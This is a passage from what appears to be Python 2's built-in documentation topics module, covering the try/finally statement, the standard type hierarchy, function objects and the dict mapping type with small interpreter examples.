an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. (This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n', 'types': u'\nThe standard type hierarchy\n***************************\n\nBelow is a list of the types that are built into Python. Extension\nmodules (written in C, Java, or other languages, depending on the\nimplementation) can define additional types. Future versions of\nPython may add types to the type hierarchy (e.g., rational numbers,\nefficiently stored arrays of integers, etc.).\n\nSome of the type descriptions below contain a paragraph listing\n\'special attributes.\' These are attributes that provide access to the\nimplementation and are not intended for general use. Their definition\nmay change in the future.\n\nNone\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name "None". It\n is used to signify the absence of a value in many situations, e.g.,\n it is returned from functions that don\'t explicitly return\n anything. Its truth value is false.\n\nNotImplemented\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "NotImplemented". Numeric methods and rich comparison methods may\n return this value if they do not implement the operation for the\n operands provided. (The interpreter will then try the reflected\n operation, or some other fallback, depending on the operator.) Its\n truth value is true.\n\nEllipsis\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "Ellipsis". It is used to indicate the presence of the "..." syntax\n in a slice. Its truth value is true.\n\n"numbers.Number"\n These are created by numeric literals and returned as results by\n arithmetic operators and arithmetic built-in functions. Numeric\n objects are immutable; once created their value never changes.\n Python numbers are of course strongly related to mathematical\n numbers, but subject to the limitations of numerical representation\n in computers.\n\n Python distinguishes between integers, floating point numbers, and\n complex numbers:\n\n "numbers.Integral"\n These represent elements from the mathematical set of integers\n (positive and negative).\n\n There are three types of integers:\n\n Plain integers\n These represent numbers in the range -2147483648 through\n 2147483647. (The range may be larger on machines with a\n larger natural word size, but not smaller.) When the result\n of an operation would fall outside this range, the result is\n normally returned as a long integer (in some cases, the\n exception "OverflowError" is raised instead). For the\n purpose of shift and mask operations, integers are assumed to\n have a binary, 2\'s complement notation using 32 or more bits,\n and hiding no bits from the user (i.e., all 4294967296\n different bit patterns correspond to different values).\n\n Long integers\n These represent numbers in an unlimited range, subject to\n available (virtual) memory only. For the purpose of shift\n and mask operations, a binary representation is assumed, and\n negative numbers are represented in a variant of 2\'s\n complement which gives the illusion of an infinite string of\n sign bits extending to the left.\n\n Booleans\n These represent the truth values False and True. The two\n objects representing the values "False" and "True" are the\n only Boolean objects. The Boolean type is a subtype of plain\n integers, and Boolean values behave like the values 0 and 1,\n respectively, in almost all contexts, the exception being\n that when converted to a string, the strings ""False"" or\n ""True"" are returned, respectively.\n\n The rules for integer representation are intended to give the\n most meaningful interpretation of shift and mask operations\n involving negative integers and the least surprises when\n switching between the plain and long integer domains. Any\n operation, if it yields a result in the plain integer domain,\n will yield the same result in the long integer domain or when\n using mixed operands. The switch between domains is transparent\n to the programmer.\n\n "numbers.Real" ("float")\n These represent machine-level double precision floating point\n numbers. You are at the mercy of the underlying machine\n architecture (and C or Java implementation) for the accepted\n range and handling of overflow. Python does not support single-\n precision floating point numbers; the savings in processor and\n memory usage that are usually the reason for using these are\n dwarfed by the overhead of using objects in Python, so there is\n no reason to complicate the language with two kinds of floating\n point numbers.\n\n "numbers.Complex"\n These represent complex numbers as a pair of machine-level\n double precision floating point numbers. The same caveats apply\n as for floating point numbers. The real and imaginary parts of a\n complex number "z" can be retrieved through the read-only\n attributes "z.real" and "z.imag".\n\nSequences\n These represent finite ordered sets indexed by non-negative\n numbers. The built-in function "len()" returns the number of items\n of a sequence. When the length of a sequence is *n*, the index set\n contains the numbers 0, 1, ..., *n*-1. Item *i* of sequence *a* is\n selected by "a[i]".\n\n Sequences also support slicing: "a[i:j]" selects all items with\n index *k* such that *i* "<=" *k* "<" *j*. When used as an\n expression, a slice is a sequence of the same type. This implies\n that the index set is renumbered so that it starts at 0.\n\n Some sequences also support "extended slicing" with a third "step"\n parameter: "a[i:j:k]" selects all items of *a* with index *x* where\n "x = i + n*k", *n* ">=" "0" and *i* "<=" *x* "<" *j*.\n\n Sequences are distinguished according to their mutability:\n\n Immutable sequences\n An object of an immutable sequence type cannot change once it is\n created. (If the object contains references to other objects,\n these other objects may be mutable and may be changed; however,\n the collection of objects directly referenced by an immutable\n object cannot change.)\n\n The following types are immutable sequences:\n\n Strings\n The items of a string are characters. There is no separate\n character type; a character is represented by a string of one\n item. Characters represent (at least) 8-bit bytes. The\n built-in functions "chr()" and "ord()" convert between\n characters and nonnegative integers representing the byte\n values. Bytes with the values 0-127 usually represent the\n corresponding ASCII values, but the interpretation of values\n is up to the program. The string data type is also used to\n represent arrays of bytes, e.g., to hold data read from a\n file.\n\n (On systems whose native character set is not ASCII, strings\n may use EBCDIC in their internal representation, provided the\n functions "chr()" and "ord()" implement a mapping between\n ASCII and EBCDIC, and string comparison preserves the ASCII\n order. Or perhaps someone can propose a better rule?)\n\n Unicode\n The items of a Unicode object are Unicode code units. A\n Unicode code unit is represented by a Unicode object of one\n item and can hold either a 16-bit or 32-bit value\n representing a Unicode ordinal (the maximum value for the\n ordinal is given in "sys.maxunicode", and depends on how\n Python is configured at compile time). Surrogate pairs may\n be present in the Unicode object, and will be reported as two\n separate items. The built-in functions "unichr()" and\n "ord()" convert between code units and nonnegative integers\n representing the Unicode ordinals as defined in the Unicode\n Standard 3.0. Conversion from and to other encodings are\n possible through the Unicode method "encode()" and the built-\n in function "unicode()".\n\n Tuples\n The items of a tuple are arbitrary Python objects. Tuples of\n two or more items are formed by comma-separated lists of\n expressions. A tuple of one item (a \'singleton\') can be\n formed by affixing a comma to an expression (an expression by\n itself does not create a tuple, since parentheses must be\n usable for grouping of expressions). An empty tuple can be\n formed by an empty pair of parentheses.\n\n Mutable sequences\n Mutable sequences can be changed after they are created. The\n subscription and slicing notations can be used as the target of\n assignment and "del" (delete) statements.\n\n There are currently two intrinsic mutable sequence types:\n\n Lists\n The items of a list are arbitrary Python objects. Lists are\n formed by placing a comma-separated list of expressions in\n square brackets. (Note that there are no special cases needed\n to form lists of length 0 or 1.)\n\n Byte Arrays\n A bytearray object is a mutable array. They are created by\n the built-in "bytearray()" constructor. Aside from being\n mutable (and hence unhashable), byte arrays otherwise provide\n the same interface and functionality as immutable bytes\n objects.\n\n The extension module "array" provides an additional example of a\n mutable sequence type.\n\nSet types\n These represent unordered, finite sets of unique, immutable\n objects. As such, they cannot be indexed by any subscript. However,\n they can be iterated over, and the built-in function "len()"\n returns the number of items in a set. Common uses for sets are fast\n membership testing, removing duplicates from a sequence, and\n computing mathematical operations such as intersection, union,\n difference, and symmetric difference.\n\n For set elements, the same immutability rules apply as for\n dictionary keys. Note that numeric types obey the normal rules for\n numeric comparison: if two numbers compare equal (e.g., "1" and\n "1.0"), only one of them can be contained in a set.\n\n There are currently two intrinsic set types:\n\n Sets\n These represent a mutable set. They are created by the built-in\n "set()" constructor and can be modified afterwards by several\n methods, such as "add()".\n\n Frozen sets\n These represent an immutable set. They are created by the\n built-in "frozenset()" constructor. As a frozenset is immutable\n and *hashable*, it can be used again as an element of another\n set, or as a dictionary key.\n\nMappings\n These represent finite sets of objects indexed by arbitrary index\n sets. The subscript notation "a[k]" selects the item indexed by "k"\n from the mapping "a"; this can be used in expressions and as the\n target of assignments or "del" statements. The built-in function\n "len()" returns the number of items in a mapping.\n\n There is currently a single intrinsic mapping type:\n\n Dictionaries\n These represent finite sets of objects indexed by nearly\n arbitrary values. The only types of values not acceptable as\n keys are values containing lists or dictionaries or other\n mutable types that are compared by value rather than by object\n identity, the reason being that the efficient implementation of\n dictionaries requires a key\'s hash value to remain constant.\n Numeric types used for keys obey the normal rules for numeric\n comparison: if two numbers compare equal (e.g., "1" and "1.0")\n then they can be used interchangeably to index the same\n dictionary entry.\n\n Dictionaries are mutable; they can be created by the "{...}"\n notation (see section Dictionary displays).\n\n The extension modules "dbm", "gdbm", and "bsddb" provide\n additional examples of mapping types.\n\nCallable types\n These are the types to which the function call operation (see\n section Calls) can be applied:\n\n User-defined functions\n A user-defined function object is created by a function\n definition (see section Function definitions). It should be\n called with an argument list containing the same number of items\n as the function\'s formal parameter list.\n\n Special attributes:\n\n +-------------------------+---------------------------------+-------------+\n | Attribute | Meaning | |\n +=========================+=================================+=============+\n | "__doc__" "func_doc" | The function\'s documentation | Writable |\n | | string, or "None" if | |\n | | unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__name__" "func_name" | The function\'s name. | Writable |\n +-------------------------+---------------------------------+-------------+\n | "__module__" | The name of the module the | Writable |\n | | function was defined in, or | |\n | | "None" if unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__defaults__" | A tuple containing default | Writable |\n | "func_defaults" | argument values for those | |\n | | arguments that have defaults, | |\n | | or "None" if no arguments have | |\n | | a default value. | |\n +-------------------------+---------------------------------+-------------+\n | "__code__" "func_code" | The code object representing | Writable |\n | | the compiled function body. | |\n +-------------------------+---------------------------------+-------------+\n | "__globals__" | A reference to the dictionary | Read-only |\n | "func_globals" | that holds the function\'s | |\n | | global variables --- the global | |\n | | namespace of the module in | |\n | | which the function was defined. | |\n +-------------------------+---------------------------------+-------------+\n | "__dict__" "func_dict" | The namespace supporting | Writable |\n | | arbitrary function attributes. | |\n +-------------------------+---------------------------------+-------------+\n | "__closure__" | "None" or a tuple of cells that | Read-only |\n | "func_closure" | contain bindings for the | |\n | | function\'s free variables. | |\n +-------------------------+---------------------------------+-------------+\n\n Most of the attributes labelled "Writable" check the type of the\n assigned value.\n\n Changed in version 2.4: "func_name" is now writable.\n\n Changed in version 2.6: The double-underscore attributes\n "__closure__", "__code__", "__defaults__", and "__globals__"\n were introduced as aliases for the corresponding "func_*"\n attributes for forwards compatibility with Python 3.\n\n Function objects also support getting and setting arbitrary\n attributes, which can be used, for example, to attach metadata\n to functions. Regular attribute dot-notation is used to get and\n set such attributes. *Note that the current implementation only\n supports function attributes on user-defined functions. Function\n attributes on built-in functions may be supported in the\n future.*\n\n Additional information about a function\'s definition can be\n retrieved from its code object; see the description of internal\n types below.\n\n User-defined methods\n A user-defined method object combines a class, a class instance\n (or "None") and any callable object (normally a user-defined\n function).\n\n Special read-only attributes: "im_self" is the class instance\n object, "im_func" is the function object; "im_class" is the\n class of "im_self" for bound methods or the class that asked for\n the method for unbound methods; "__doc__" is the method\'s\n documentation (same as "im_func.__doc__"); "__name__" is the\n method name (same as "im_func.__name__"); "__module__" is the\n name of the module the method was defined in, or "None" if\n unavailable.\n\n Changed in version 2.2: "im_self" used to refer to the class\n that defined the method.\n\n Changed in version 2.6: For Python 3 forward-compatibility,\n "im_func" is also available as "__func__", and "im_self" as\n "__self__".\n\n Methods also support accessing (but not setting) the arbitrary\n function attributes on the underlying function object.\n\n User-defined method objects may be created when getting an\n attribute of a class (perhaps via an instance of that class), if\n that attribute is a user-defined function object, an unbound\n user-defined method object, or a class method object. When the\n attribute is a user-defined method object, a new method object\n is only created if the class from which it is being retrieved is\n the same as, or a derived class of, the class stored in the\n original method object; otherwise, the original method object is\n used as it is.\n\n When a user-defined method object is created by retrieving a\n user-defined function object from a class, its "im_self"\n attribute is "None" and the method object is said to be unbound.\n When one is created by retrieving a user-defined function object\n from a class via one of its instances, its "im_self" attribute\n is the instance, and the method object is said to be bound. In\n either case, the new method\'s "im_class" attribute is the class\n from which the retrieval takes place, and its "im_func"\n attribute is the original function object.\n\n When a user-defined method object is created by retrieving\n another method object from a class or instance, the behaviour is\n the same as for a function object, except that the "im_func"\n attribute of the new instance is not the original method object\n but its "im_func" attribute.\n\n When a user-defined method object is created by retrieving a\n class method object from a class or instance, its "im_self"\n attribute is the class itself, and its "im_func" attribute is\n the function object underlying the class method.\n\n When an unbound user-defined method object is called, the\n underlying function ("im_func") is called, with the restriction\n that the first argument must be an instance of the proper class\n ("im_class") or of a derived class thereof.\n\n When a bound user-defined method object is called, the\n underlying function ("im_func") is called, inserting the class\n instance ("im_self") in front of the argument list. For\n instance, when "C" is a class which contains a definition for a\n function "f()", and "x" is an instance of "C", calling "x.f(1)"\n is equivalent to calling "C.f(x, 1)".\n\n When a user-defined method object is derived from a class method\n object, the "class instance" stored in "im_self" will actually\n be the class itself, so that calling either "x.f(1)" or "C.f(1)"\n is equivalent to calling "f(C,1)" where "f" is the underlying\n function.\n\n Note that the transformation from function object to (unbound or\n bound) method object happens each time the attribute is\n retrieved from the class or instance. In some cases, a fruitful\n optimization is to assign the attribute to a local variable and\n call that local variable. Also notice that this transformation\n only happens for user-defined functions; other callable objects\n (and all non-callable objects) are retrieved without\n transformation. It is also important to note that user-defined\n functions which are attributes of a class instance are not\n converted to bound methods; this *only* happens when the\n function is an attribute of the class.\n\n Generator functions\n A function or method which uses the "yield" statement (see\n section The yield statement) is called a *generator function*.\n Such a function, when called, always returns an iterator object\n which can be used to execute the body of the function: calling\n the iterator\'s "next()" method will cause the function to\n execute until it provides a value using the "yield" statement.\n When the function executes a "return" statement or falls off the\n end, a "StopIteration" exception is raised and the iterator will\n have reached the end of the set of values to be returned.\n\n Built-in functions\n A built-in function object is a wrapper around a C function.\n Examples of built-in functions are "len()" and "math.sin()"\n ("math" is a standard built-in module). The number and type of\n the arguments are determined by the C function. Special read-\n only attributes: "__doc__" is the function\'s documentation\n string, or "None" if unavailable; "__name__" is the function\'s\n name; "__self__" is set to "None" (but see the next item);\n "__module__" is the name of the module the function was defined\n in or "None" if unavailable.\n\n Built-in methods\n This is really a different disguise of a built-in function, this\n time containing an object passed to the C function as an\n implicit extra argument. An example of a built-in method is\n "alist.append()", assuming *alist* is a list object. In this\n case, the special read-only attribute "__self__" is set to the\n object denoted by *alist*.\n\n Class Types\n Class types, or "new-style classes," are callable. These\n objects normally act as factories for new instances of\n themselves, but variations are possible for class types that\n override "__new__()". The arguments of the call are passed to\n "__new__()" and, in the typical case, to "__init__()" to\n initialize the new instance.\n\n Classic Classes\n Class objects are described below. When a class object is\n called, a new class instance (also described below) is created\n and returned. This implies a call to the class\'s "__init__()"\n method if it has one. Any arguments are passed on to the\n "__init__()" method. If there is no "__init__()" method, the\n class must be called without arguments.\n\n Class instances\n Class instances are described below. Class instances are\n callable only when the class has a "__call__()" method;\n "x(arguments)" is a shorthand for "x.__call__(arguments)".\n\nModules\n Modules are imported by the "import" statement (see section The\n import statement). A module object has a namespace implemented by a\n dictionary object (this is the dictionary referenced by the\n func_globals attribute of functions defined in the module).\n Attribute references are translated to lookups in this dictionary,\n e.g., "m.x" is equivalent to "m.__dict__["x"]". A module object\n does not contain the code object used to initialize the module\n (since it isn\'t needed once the initialization is done).\n\n Attribute assignment updates the module\'s namespace dictionary,\n e.g., "m.x = 1" is equivalent to "m.__dict__["x"] = 1".\n\n Special read-only attribute: "__dict__" is the module\'s namespace\n as a dictionary object.\n\n **CPython implementation detail:** Because of the way CPython\n clears module dictionaries, the module dictionary will be cleared\n when the module falls out of scope even if the dictionary still has\n live references. To avoid this, copy the dictionary or keep the\n module around while using its dictionary directly.\n\n Predefined (writable) attributes: "__name__" is the module\'s name;\n "__doc__" is the module\'s documentation string, or "None" if\n unavailable; "__file__" is the pathname of the file from which the\n module was loaded, if it was loaded from a file. The "__file__"\n attribute is not present for C modules that are statically linked\n into the interpreter; for extension modules loaded dynamically from\n a shared library, it is the pathname of the shared library file.\n\nClasses\n Both class types (new-style classes) and class objects (old-\n style/classic classes) are typically created by class definitions\n (see section Class definitions). A class has a namespace\n implemented by a dictionary object. Class attribute references are\n translated to lookups in this dictionary, e.g., "C.x" is translated\n to "C.__dict__["x"]" (although for new-style classes in particular\n there are a number of hooks which allow for other means of locating\n attributes). When the attribute name is not found there, the\n attribute search continues in the base classes. For old-style\n classes, the search is depth-first, left-to-right in the order of\n occurrence in the base class list. New-style classes use the more\n complex C3 method resolution order which behaves correctly even in\n the presence of \'diamond\' inheritance structures where there are\n multiple inheritance paths leading back to a common ancestor.\n Additional details on the C3 MRO used by new-style classes can be\n found in the documentation accompanying the 2.3 release at\n https://www.python.org/download/releases/2.3/mro/.\n\n When a class attribute reference (for class "C", say) would yield a\n user-defined function object or an unbound user-defined method\n object whose associated class is either "C" or one of its base\n classes, it is transformed into an unbound user-defined method\n object whose "im_class" attribute is "C". When it would yield a\n class method object, it is transformed into a bound user-defined\n method object whose "im_self" attribute is "C". When it would\n yield a static method object, it is transformed into the object\n wrapped by the static method object. See section Implementing\n Descriptors for another way in which attributes retrieved from a\n class may differ from those actually contained in its "__dict__"\n (note that only new-style classes support descriptors).\n\n Class attribute assignments update the class\'s dictionary, never\n the dictionary of a base class.\n\n A class object can be called (see above) to yield a class instance\n (see below).\n\n Special attributes: "__name__" is the class name; "__module__" is\n the module name in which the class was defined; "__dict__" is the\n dictionary containing the class\'s namespace; "__bases__" is a tuple\n (possibly empty or a singleton) containing the base classes, in the\n order of their occurrence in the base class list; "__doc__" is the\n class\'s documentation string, or None if undefined.\n\nClass instances\n A class instance is created by calling a class object (see above).\n A class instance has a namespace implemented as a dictionary which\n is the first place in which attribute references are searched.\n When an attribute is not found there, and the instance\'s class has\n an attribute by that name, the search continues with the class\n attributes. If a class attribute is found that is a user-defined\n function object or an unbound user-defined method object whose\n associated class is the class (call it "C") of the instance for\n which the attribute reference was initiated or one of its bases, it\n is transformed into a bound user-defined method object whose\n "im_class" attribute is "C" and whose "im_self" attribute is the\n instance. Static method and class method objects are also\n transformed, as if they had been retrieved from class "C"; see\n above under "Classes". See section Implementing Descriptors for\n another way in which attributes of a class retrieved via its\n instances may differ from the objects actually stored in the\n class\'s "__dict__". If no class attribute is found, and the\n object\'s class has a "__getattr__()" method, that is called to\n satisfy the lookup.\n\n Attribute assignments and deletions update the instance\'s\n dictionary, never a class\'s dictionary. If the class has a\n "__setattr__()" or "__delattr__()" method, this is called instead\n of updating the instance dictionary directly.\n\n Class instances can pretend to be numbers, sequences, or mappings\n if they have methods with certain special names. See section\n Special method names.\n\n Special attributes: "__dict__" is the attribute dictionary;\n "__class__" is the instance\'s class.\n\nFiles\n A file object represents an open file. File objects are created by\n the "open()" built-in function, and also by "os.popen()",\n "os.fdopen()", and the "makefile()" method of socket objects (and\n perhaps by other functions or methods provided by extension\n modules). The objects "sys.stdin", "sys.stdout" and "sys.stderr"\n are initialized to file objects corresponding to the interpreter\'s\n standard input, output and error streams. See File Objects for\n complete documentation of file objects.\n\nInternal types\n A few types used internally by the interpreter are exposed to the\n user. Their definitions may change with future versions of the\n interpreter, but they are mentioned here for completeness.\n\n Code objects\n Code objects represent *byte-compiled* executable Python code,\n or *bytecode*. The difference between a code object and a\n function object is that the function object contains an explicit\n reference to the function\'s globals (the module in which it was\n defined), while a code object contains no context; also the\n default argument values are stored in the function object, not\n in the code object (because they represent values calculated at\n run-time). Unlike function objects, code objects are immutable\n and contain no references (directly or indirectly) to mutable\n objects.\n\n Special read-only attributes: "co_name" gives the function name;\n "co_argcount" is the number of positional arguments (including\n arguments with default values); "co_nlocals" is the number of\n local variables used by the function (including arguments);\n "co_varnames" is a tuple containing the names of the local\n variables (starting with the argument names); "co_cellvars" is a\n tuple containing the names of local variables that are\n referenced by nested functions; "co_freevars" is a tuple\n containing the names of free variables; "co_code" is a string\n representing the sequence of bytecode instructions; "co_consts"\n is a tuple containing the literals used by the bytecode;\n "co_names" is a tuple containing the names used by the bytecode;\n "co_filename" is the filename from which the code was compiled;\n "co_firstlineno" is the first line number of the function;\n "co_lnotab" is a string encoding the mapping from bytecode\n offsets to line numbers (for details see the source code of the\n interpreter); "co_stacksize" is the required stack size\n (including local variables); "co_flags" is an integer encoding a\n number of flags for the interpreter.\n\n The following flag bits are defined for "co_flags": bit "0x04"\n is set if the function uses the "*arguments" syntax to accept an\n arbitrary number of positional arguments; bit "0x08" is set if\n the function uses the "**keywords" syntax to accept arbitrary\n keyword arguments; bit "0x20" is set if the function is a\n generator.\n\n Future feature declarations ("from __future__ import division")\n also use bits in "co_flags" to indicate whether a code object\n was compiled with a particular feature enabled: bit "0x2000" is\n set if the function was compiled with future division enabled;\n bits "0x10" and "0x1000" were used in earlier versions of\n Python.\n\n Other bits in "co_flags" are reserved for internal use.\n\n If a code object represents a function, the first item in\n "co_consts" is the documentation string of the function, or\n "None" if undefined.\n\n Frame objects\n Frame objects represent execution frames. They may occur in\n traceback objects (see below).\n\n Special read-only attributes: "f_back" is to the previous stack\n frame (towards the caller), or "None" if this is the bottom\n stack frame; "f_code" is the code object being executed in this\n frame; "f_locals" is the dictionary used to look up local\n variables; "f_globals" is used for global variables;\n "f_builtins" is used for built-in (intrinsic) names;\n "f_restricted" is a flag indicating whether the function is\n executing in restricted execution mode; "f_lasti" gives the\n precise instruction (this is an index into the bytecode string\n of the code object).\n\n Special writable attributes: "f_trace", if not "None", is a\n function called at the start of each source code line (this is\n used by the debugger); "f_exc_type", "f_exc_value",\n "f_exc_traceback" represent the last exception raised in the\n parent frame provided another exception was ever raised in the\n current frame (in all other cases they are None); "f_lineno" is\n the current line number of the frame --- writing to this from\n within a trace function jumps to the given line (only for the\n bottom-most frame). A debugger can implement a Jump command\n (aka Set Next Statement) by writing to f_lineno.\n\n Traceback objects\n Traceback objects represent a stack trace of an exception. A\n traceback object is created when an exception occurs. When the\n search for an exception handler unwinds the execution stack, at\n each unwound level a traceback object is inserted in front of\n the current traceback. When an exception handler is entered,\n the stack trace is made available to the program. (See section\n The try statement.) It is accessible as "sys.exc_traceback", and\n also as the third item of the tuple returned by\n "sys.exc_info()". The latter is the preferred interface, since\n it works correctly when the program is using multiple threads.\n When the program contains no suitable handler, the stack trace\n is written (nicely formatted) to the standard error stream; if\n the interpreter is interactive, it is also made available to the\n user as "sys.last_traceback".\n\n Special read-only attributes: "tb_next" is the next level in the\n stack trace (towards the frame where the exception occurred), or\n "None" if there is no next level; "tb_frame" points to the\n execution frame of the current level; "tb_lineno" gives the line\n number where the exception occurred; "tb_lasti" indicates the\n precise instruction. The line number and last instruction in\n the traceback may differ from the line number of its frame\n object if the exception occurred in a "try" statement with no\n matching except clause or with a finally clause.\n\n Slice objects\n Slice objects are used to represent slices when *extended slice\n syntax* is used. This is a slice using two colons, or multiple\n slices or ellipses separated by commas, e.g., "a[i:j:step]",\n "a[i:j, k:l]", or "a[..., i:j]". They are also created by the\n built-in "slice()" function.\n\n Special read-only attributes: "start" is the lower bound; "stop"\n is the upper bound; "step" is the step value; each is "None" if\n omitted. These attributes can have any type.\n\n Slice objects support one method:\n\n slice.indices(self, length)\n\n This method takes a single integer argument *length* and\n computes information about the extended slice that the slice\n object would describe if applied to a sequence of *length*\n items. It returns a tuple of three integers; respectively\n these are the *start* and *stop* indices and the *step* or\n stride length of the slice. Missing or out-of-bounds indices\n are handled in a manner consistent with regular slices.\n\n New in version 2.3.\n\n Static method objects\n Static method objects provide a way of defeating the\n transformation of function objects to method objects described\n above. A static method object is a wrapper around any other\n object, usually a user-defined method object. When a static\n method object is retrieved from a class or a class instance, the\n object actually returned is the wrapped object, which is not\n subject to any further transformation. Static method objects are\n not themselves callable, although the objects they wrap usually\n are. Static method objects are created by the built-in\n "staticmethod()" constructor.\n\n Class method objects\n A class method object, like a static method object, is a wrapper\n around another object that alters the way in which that object\n is retrieved from classes and class instances. The behaviour of\n class method objects upon such retrieval is described above,\n under "User-defined methods". Class method objects are created\n by the built-in "classmethod()" constructor.\n', 'typesfunctions': u'\nFunctions\n*********\n\nFunction objects are created by function definitions. The only\noperation on a function object is to call it: "func(argument-list)".\n\nThere are really two flavors of function objects: built-in functions\nand user-defined functions. Both support the same operation (to call\nthe function), but the implementation is different, hence the\ndifferent object types.\n\nSee Function definitions for more information.\n', 'typesmapping': u'\nMapping Types --- "dict"\n************************\n\nA *mapping* object maps *hashable* values to arbitrary objects.\nMappings are mutable objects. There is currently only one standard\nmapping type, the *dictionary*. (For other containers see the built\nin "list", "set", and "tuple" classes, and the "collections" module.)\n\nA dictionary\'s keys are *almost* arbitrary values. Values that are\nnot *hashable*, that is, values containing lists, dictionaries or\nother mutable types (that are compared by value rather than by object\nidentity) may not be used as keys. Numeric types used for keys obey\nthe normal rules for numeric comparison: if two numbers compare equal\n(such as "1" and "1.0") then they can be used interchangeably to index\nthe same dictionary entry. (Note however, that since computers store\nfloating-point numbers as approximations it is usually unwise to use\nthem as dictionary keys.)\n\nDictionaries can be created by placing a comma-separated list of "key:\nvalue" pairs within braces, for example: "{\'jack\': 4098, \'sjoerd\':\n4127}" or "{4098: \'jack\', 4127: \'sjoerd\'}", or by the "dict"\nconstructor.\n\nclass dict(**kwarg)\nclass dict(mapping, **kwarg)\nclass dict(iterable, **kwarg)\n\n Return a new dictionary initialized from an optional positional\n argument and a possibly empty set of keyword arguments.\n\n If no positional argument is given, an empty dictionary is created.\n If a positional argument is given and it is a mapping object, a\n dictionary is created with the same key-value pairs as the mapping\n object. Otherwise, the positional argument must be an *iterable*\n object. Each item in the iterable must itself be an iterable with\n exactly two objects. The first object of each item becomes a key\n in the new dictionary, and the second object the corresponding\n value. If a key occurs more than once, the last value for that key\n becomes the corresponding value in the new dictionary.\n\n If keyword arguments are given, the keyword arguments and their\n values are added to the dictionary created from the positional\n argument. If a key being added is already present, the value from\n the keyword argument replaces the value from the positional\n argument.\n\n To illustrate, the following examples all return a dictionary equal\n to "{"one": 1, "two": 2, "three": 3}":\n\n >>> a = dict(one=1, two=2, three=3)\n >>> b = {\'one\': 1, \'two\': 2, \'three\': 3}\n >>> c = dict(zip([\'one\', \'two\', \'three\'], [1, 2, 3]))\n >>> d = dict([(\'two\', 2), (\'one\', 1), (\'three\', 3)])\n >>> e = dict({\'three\': 3, \'one\': 1, \'two\': 2})\n >>> a == b == c == d == e\n True\n\n Providing keyword arguments as in the first example only works for\n keys that are valid Python identifiers. Otherwise, any valid keys\n can be used.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for building a dictionary from\n keyword arguments added.\n\n These are the operations that dictionaries support (and therefore,\n custom mapping types should support too):\n\n len(d)\n\n Return the number of items in the dictionary *d*.\n\n d[key]\n\n Return the item of *d* with key *key*. Raises a "KeyError" if\n *key* is not in the map.\n\n If a subclass of dict defines a method "__missing__()" and *key*\n is not present, the "d[key]" operation calls that method with\n the key *key* as argument. The "d[key]" operation then returns\n or raises whatever is returned or raised by the\n "__missing__(key)" call. No other operations or methods invoke\n "__missing__()". If "__missing__()" is not defined, "KeyError"\n is raised. "__missing__()" must be a method; it cannot be an\n instance variable:\n\n >>> class Counter(dict):\n ... def __missing__(self, key):\n ... return 0\n >>> c = Counter()\n >>> c[\'red\']\n 0\n >>> c[\'red\'] += 1\n >>> c[\'red\']\n 1\n\n The example above shows part of the implementation of\n "collections.Counter". A different "__missing__" method is used\n by "collections.defaultdict".\n\n New in version 2.5: Recognition of __missing__ methods of dict\n subclasses.\n\n d[key] = value\n\n Set "d[key]" to *value*.\n\n del d[key]\n\n Remove "d[key]" from *d*. Raises a "KeyError" if *key* is not\n in the map.\n\n key in d\n\n Return "True" if *d* has a key *key*, else "False".\n\n New in version 2.2.\n\n key not in d\n\n Equivalent to "not key in d".\n\n New in version 2.2.\n\n iter(d)\n\n Return an iterator over the keys of the dictionary. This is a\n shortcut for "iterkeys()".\n\n clear()\n\n Remove all items from the dictionary.\n\n copy()\n\n Return a shallow copy of the dictionary.\n\n fromkeys(seq[, value])\n\n Create a new dictionary with keys from *seq* and values set to\n *value*.\n\n "fromkeys()" is a class method that returns a new dictionary.\n *value* defaults to "None".\n\n New in version 2.3.\n\n get(key[, default])\n\n Return the value for *key* if *key* is in the dictionary, else\n *default*. If *default* is not given, it defaults to "None", so\n that this method never raises a "KeyError".\n\n has_key(key)\n\n Test for the presence of *key* in the dictionary. "has_key()"\n is deprecated in favor of "key in d".\n\n items()\n\n Return a copy of the dictionary\'s list of "(key, 